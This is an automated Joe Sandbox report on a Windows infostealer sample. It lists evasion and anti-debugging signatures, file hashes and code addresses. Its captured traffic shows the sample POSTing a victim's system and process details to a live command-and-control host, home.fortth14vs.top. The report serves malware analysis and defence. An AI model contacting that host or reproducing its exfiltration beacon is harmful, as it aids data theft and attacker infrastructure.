Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bo6uO5gKL4.exe

Overview

General Information

Sample name:Bo6uO5gKL4.exe
renamed because original name is a hash value
Original sample name:935d1fe58326c50f930c94e3493b266c.exe
Analysis ID:1582826
MD5:935d1fe58326c50f930c94e3493b266c
SHA1:cd649b9eaae16dc9457c388970427710e485eb9c
SHA256:ad2f45143de4a73f40010ac03e0aff210dcf24dfc8b0fffba678c3e9f20d5e22
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Bo6uO5gKL4.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\Bo6uO5gKL4.exe" MD5: 935D1FE58326C50F930C94E3493B266C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Bo6uO5gKL4.exeAvira: detected
Antivirus detection for URL or domain
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahAvira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZAvira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0tsiAvira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Bo6uO5gKL4.exeReversingLabs: Detection: 47%
Source: Bo6uO5gKL4.exeVirustotal: Detection: 44%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Bo6uO5gKL4.exeJoe Sandbox ML: detected
Source: Bo6uO5gKL4.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_005EA5B0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_005EA7F0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_005EA7F0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_005EA7F0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_005EA7F0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_005EA7F0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_005EA7F0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_005EB560
Source: Bo6uO5gKL4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0058255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0058255D
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_005829FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 444098Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 38 30 35 31 37 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0064A8C0 recvfrom,0_2_0064A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
Source: unknownHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 444098Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 38 30 35 31 37 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:42:03 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:42:05 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: Bo6uO5gKL4.exe, 00000000.00000003.1669640558.000000000187B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ
Source: Bo6uO5gKL4.exe, 00000000.00000003.1670432119.0000000001849000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000184B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000184B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963
Source: Bo6uO5gKL4.exe, 00000000.00000002.1675539767.0000000001856000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1669640558.0000000001853000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000181E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000181E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0tsi
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: Bo6uO5gKL4.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: Bo6uO5gKL4.exe, Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

System Summary

barindex
PE file contains section with special chars
Source: Bo6uO5gKL4.exeStatic PE information: section name:
Source: Bo6uO5gKL4.exeStatic PE information: section name: .idata
Source: Bo6uO5gKL4.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018BBD460_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018BBD460_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018BBD460_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018BBD460_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018BBD460_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018BBD460_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018BBD460_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018BBD460_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018BBD460_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005905B00_2_005905B0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_00596FA00_2_00596FA0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005BF1000_2_005BF100
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0064B1800_2_0064B180
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_006500E00_2_006500E0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0090A0000_2_0090A000
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0090E0500_2_0090E050
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005E62100_2_005E6210
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0064C3200_2_0064C320
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_006504200_2_00650420
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_008D44100_2_008D4410
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0058E6200_2_0058E620
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_009047800_2_00904780
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0064C7700_2_0064C770
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005EA7F00_2_005EA7F0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_008E67300_2_008E6730
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005949400_2_00594940
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0058A9600_2_0058A960
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0063C9000_2_0063C900
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0083AAC00_2_0083AAC0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_00756AC00_2_00756AC0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_00714B600_2_00714B60
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_008F8BF00_2_008F8BF0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0083AB2C0_2_0083AB2C
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0058CBB00_2_0058CBB0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0090CC900_2_0090CC90
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_008FCD800_2_008FCD80
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_00904D400_2_00904D40
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_00740D800_2_00740D80
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0089AE300_2_0089AE30
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_008D2F900_2_008D2F90
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005A4F700_2_005A4F70
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0064EF900_2_0064EF90
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_00648F900_2_00648F90
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005910E60_2_005910E6
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_008ED4300_2_008ED430
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_008F35B00_2_008F35B0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_009117A00_2_009117A0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 005C50A0 appears 81 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 005871E0 appears 40 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 00737220 appears 91 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 0058CAA0 appears 59 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 0059CD40 appears 63 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 0059CCD0 appears 54 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 0075CBC0 appears 87 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 005875A0 appears 552 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 005C4F40 appears 278 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 005873F0 appears 99 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 005C4FD0 appears 206 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 005C5340 appears 39 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: String function: 006644A0 appears 56 times
Source: Bo6uO5gKL4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Bo6uO5gKL4.exeStatic PE information: Section: nlrwmcpx ZLIB complexity 0.994404263920135
Source: Bo6uO5gKL4.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
